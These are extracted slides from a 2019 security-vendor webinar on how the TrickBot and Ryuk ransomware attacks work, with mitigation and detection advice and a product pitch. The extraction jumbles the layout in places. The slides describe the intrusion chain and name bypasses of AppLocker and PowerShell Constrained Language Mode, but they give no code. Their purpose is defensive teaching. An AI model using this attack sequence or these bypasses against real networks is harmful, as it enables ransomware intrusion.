Webinar 1540 Slides

3/19/2019
Sponsored by
Anatomy of a Hack: How
TEMP.Mixmaster Attackers
Use TrickBot and RyukTo
Poach Big Game
© 2019 Monterey Technology Group Inc.
 Made possible by
Thanks to
1
3/19/2019
PAGE 3
Anatomy of an Attack
Ryuk & Trickbot
Webinar
March 19, 2019
Copyright © 2019 STEALTHbits Technologies, Inc. All rights reserved. | STEALTHbits Confidential
Agenda
PAGE 4
• Introductions
• The Evolution of Ransomware
• Breakdown of Ryuk & Trickbot
• Live Demo of PowerShell Empire
• Mitigation & Detection
• Live Demo of Mitigation & Detection
• Q&A
• Next Steps
2
3/19/2019
PAGE 5
Jeff Warren
General Manager, Products
STEALTHbits Technologies
PAGE 6
Evolution of
Ransomware
3
3/19/2019
Evolution of Ransomware
PAGE 7
Petya/NotPetya
AIDS Trojan Virus CryptoLocker EternalBlue
WannaCry
1989 2013 2017


2015 2018
SamSam Ryuk
Characteristics of Modern Ransomware Attacks
Lateral PAGE 8
Targeted Recon Exploits Dwell Time
Movement
4
3/19/2019
PAGE 9
Trickbot & Ryuk
PAGE 10
Overview of Trickbot & Ryuk
• TrickBot trojan used for initial

compromise
$4M
• Ryuk ransomware encrypts data
days/weeks/months later
• Source code derived from commodity
ransomware Hermes
• Attributed to threat actors out of
Russia GRIM SPIDER
Extorted from enterprises between
August and December of 2018
5
3/19/2019
PAGE 11
Initial Infection with Trickbot
• Often done through phishing

• Office documents with
embedded macros
• Once run, downloads and
executes Trickbot from
remote server
Source: FireEye
PAGE 12
Trickbot’sBag of Tricks
Tasks Module
•systeminfo – computer specs (operating system,
Gather information from the infected architecture, processor)
user’s system •networkdll – gathers machine data (username, domain
name, etc.)
•wormdll – SMB exploit (MS17-010)
Infect more machines within the system •sharedll – drops copies in administrative shares C$ or
ADMIN$
•tabdll
•injectdll
Steal credentials and intercept •importdll
connections to certain banking sites •mailsearcher
•pwgrab
•NewBCtestnDll64
PowerShell Empire module for reverse
shell
Source: TrendMicro
6
3/19/2019
PAGE 13
Recon & Lateral Movement
• May be months after initial Trickbot

infection until Ryuk is deployed
• TrickBot's reverse-shell module
(NewBCtestDll) used to execute
obfuscated PowerShell scripts
which ultimately download and
launch an Empire backdoor.
• Manual interaction to determine
targets and prepare for Ryuk
Source: FireEye
PAGE 14
Spreading Laterally with Trickbot
Wormdll SMB exploit

(MS17-010)
Trickbot
NewBCtestnDll64 sharedll admin$ and
Mimikatz credential theft c$
7
3/19/2019
PAGE 15
Dropping Ryuk
• Actors produce a list of targets

systems and save it to one or multiple
.txt files.
• Copy PsExec, Ryuk, and scripts to
domain controllers or other high
privilege systems
• Copy a Ryuk sample to each host
contained in .txt files and execute
them.
Source: CrowdStrike
PAGE 16
Real World Example – Ryuk (Q3 2018)
• Using stolen credentials the attacker copied AdFind.exe onto a domain controller
• AdFind.exe was executed (twice) to collect information about Active Directory
• Attacker tested access to multiple domain controllers in the victim environment
• The attacker logged into a DC and copied PSExec.exe, a batch script used to kill
processes and stop services, and an instance of Ryuk onto the system.
• Using PsExec the attacker copied the process/service killing batch script to the
%TEMP% folder on hundreds of computers across the victim environment, from which
it was then executed.
• The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot%
directories of these same computers. A new service configured to launch the Ryuk
binary was then created and started.
• Ryuk execution proceeded as normal, encrypting files on impacted systems.
Source: FireEye
8
3/19/2019
PAGE 17
Overview of the Attack
1. An obfuscated PowerShell script is executed and connects to a remote IP address.
2. A reverse shell is downloaded and executed on the compromised host.
3. PowerShell anti-logging scripts are executed on the host.
4. Reconnaissance of the network is conducted using standard Windows command line tools
along with external uploaded tools.
5. Lateral movement throughout the network is enabled using Remote Desktop Protocol
(RDP).
6. Service User Accounts are created.
7. PowerShell Empire is downloaded and installed as a service.
8. Lateral movement is continued until privileges are recovered to obtain access to a domain
controller.
9. PSEXEC is used to push out the Ryuk binary to individual hosts.
10. Batch scripts are executed to terminate processes/services and remove backups, followed
by the Ryuk binary.
Source: CrowdStrike®
PAGE 18
LIVE DEMO
PowerShell Empire
9
3/19/2019
PAGE 19
PowerShell Empire – Demo Overview
Weak PC
Hardened PC
   
Perform Compromise Compromise SQL
Infect PC
Reconnaissance Accounts Server (MS SQL)
PAGE 20
Mitigating the
Attack
10
3/19/2019
PAGE 21
How Does TrickbotSpread?
>
Step 1 Step 2 Step 3 Step 4
• SMB v1 • Obfuscated • LDAP Recon to • Credential

vulnerability PowerShell find high value compromise &
MS17-010 scripts & targets administrative
reverse shells network shares
Source: CrowdStrike
PAGE 22
Mitigation of MS17-010 Vulnerability
• Install KB4012598 to patch vulnerability in SMBv1

• Disable SMBv1 altogether
https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-
in-windows-and
11
3/19/2019
PAGE 23
PowerShell Security – Constrained Language Mode
• Introduced in PowerShell 3.0

• What does Constrained Language Mode prevent?
– Only approved .NET types are allowed.
– The Add-Type cmdlet can load signed assemblies, but it cannot load arbitrary C#
code or Win32 APIs.
– COM objects are blocked.
• How to Enable?
– Device Guard User Mode Code Integrity (UMCI), now Windows Defender
Application Control
– AppLocker in allow mode
– Can be controlled by environmental variable, but that is not secure! Use one of
the above techniques
PAGE 24
Empire Launcher with Constrained Language Mode
12
3/19/2019
PAGE 25
Constrained Language Mode Bypass
Invoke-History bypassed Constrained Language mode until patched 2/19/2019
Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0632
PAGE 26
AppLocker
• When running with Allow actions, this will enforce Constrained Language
Mode
• Can be bypassed by stopping the AppID service
13
3/19/2019
PAGE 27
Preventing PowerShell Downgrade Attacks
• PowerShell 2.0 is not limited by

Constrained Langauge Mode, if
possible disable it
PAGE 28
Restrict Admin Rights
“Ryuk does not encrypt files from
within its own process memory
• Administrators and privileged local
groups space, but injects into a remote
• Admin-equivalences such as
process. Before injecting into a
– Act as part of the OS
remote process, Ryuk attempts to
(SeTcbPrivilege) adjust its token privileges to have
– Debug programs (SeDebugPrivileg) the SeDebugPrivilege. It takes
– Take Ownership no action if the adjustment of the
(SeTakeOwnershipPrivilege) token privileges fails.”
CrowdStrike
14
3/19/2019
PAGE 29
Detecting the
Attack
PAGE 30
PowerShell Script Block Logging
• Many tools, like Empire, use encoded commands
15
3/19/2019
PAGE 31
• Traditional PowerShell logging shows encoded commands
PAGE 32
• Script Block Logging captures commands after it is decoded by PowerShell
16
3/19/2019
PAGE 33
• Even if command opens a web cradle to pull down code, it will show the results
PAGE 34
Enabling PowerShell Script Block Logging
• Administra ve Templates → Windows Components → Windows PowerShell
17
3/19/2019
PAGE 35
Additional Detections to Consider
Attack Indicator Detection Detection

Difficulty Accuracy
Pass-the-Hash Medium High
LDAP Reconnaissance High Low
Pass-the-Ticket High Medium
Overpass-the-Hash Medium High
DC Sync Medium Medium
… … …
PAGE 36
LIVE DEMO
Attack Detection &
Mitigation
18
3/19/2019
PAGE 37
STEALTHbits’ Active Directory Solution Architecture
Active Directory Azure Active Directory AD-Connected Resources
Applications
Resources
Systems
Authentication Objects GPOs Permissions
Data
LDAP Attributes Replication Configurations
Unstructured Data
Approach Differential Agent-less Least Privilege LSASS Agent Blocking
Cloud Data
Reporting & Governance Rollback & Recovery Threat Detection & Response
Platform
Services
Clean Up & Remediation Alerting Blocking
Structured Data
Integration REST API SQL Syslog …
Points
…
PAGE 38
STEALTHbits’ Active Directory Solution
Security Threats
Identify and eliminate weak passwords Detect modern threats against AD in real-time
Prevent unauthorized changes and authentication Identify abnormal behavior (UBA)
Identify and remediate configuration and Automatically respond to threats and abnormalities
permission vulnerabilities for instant containment
Operations Compliance
Automate account deprovisioning Govern group memberships
Clean-up stale and toxic objects Automate privileged access reporting
Rollback and recover from changes and deletions Control access to sensitive security groups and data
19
3/19/2019
PAGE 39
STEALTHbits’ Active Directory Product Portfolio
Policy & Password Enforcement Threat Detection & Response
Rollback & Recovery Reporting & Governance
PAGE 40
Modern AD Attacks
• SPN Scanning • Kerberoast • Pass-the-Ticket • NTDS.dit

• Privileged • Silver Tickets • Pass-the-Hash • AdminSDHolder
Accounts • DC Sync • Overpass-the- • Golden Tickets
• Sensitive • Password Hash • Skeleton Key
Servers spraying • Trust Tickets
• SID History • SPNs
• Malicious SSPs
20
3/19/2019
PAGE 41
Next Steps
• Learn More
– https://attack.stealthbits.com
• Download a Trial
– Visit https://www.stealthbits.com/free-trial
• Contact Us
– Visit https://www.stealthbits.com/contact
PAGE 42
©STEALTHbits Technologies, Inc. All rights reserved. STEALTHbits and other product names are or may be registered trademarks and/or trademarks in the U.S. and/or other countries.
The information herein is for informational purposes only and represents the current view of STEALTHbits Technologies as of the date of this presentation. Because STEALTHbits must respond to changing market conditions, it should not be
interpreted to be a commitment on the part of STEALTHbits, and STEALTHbits cannot guarantee the accuracy of any information provided after the date of this presentation. STEALTHBITS MAKES NO WARRANTIES, EXPRESS, IMPLIED OR
STATUATORY, AS TO THE INFORMATION IN THIS PRESENTATION.
21

Webinar 1540 Slides

Uploaded by

Copyright:

Available Formats

Webinar 1540 Slides

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Webinar 1540 Slides

Uploaded by

Copyright:

Available Formats

3/19/2019

© 2019 Monterey Technology Group Inc.

1989 2013 2017

Characteristics of Modern Ransomware Attacks

• TrickBot trojan used for initial

• Often done through phishing

• May be months after initial Trickbot

Wormdll SMB exploit

• Actors produce a list of targets

• SMB v1 • Obfuscated • LDAP Recon to • Credential

• Install KB4012598 to patch vulnerability in SMBv1

• Introduced in PowerShell 3.0

Invoke-History bypassed Constrained Language mode until patched 2/19/2019

• PowerShell 2.0 is not limited by

• Many tools, like Empire, use encoded commands

• Traditional PowerShell logging shows encoded commands

• Script Block Logging captures commands after it is decoded by PowerShell

• Administra ve Templates → Windows Components → Windows PowerShell

Attack Indicator Detection Detection

Policy & Password Enforcement Threat Detection & Response

Rollback & Recovery Reporting & Governance

• SPN Scanning • Kerberoast • Pass-the-Ticket • NTDS.dit

You might also like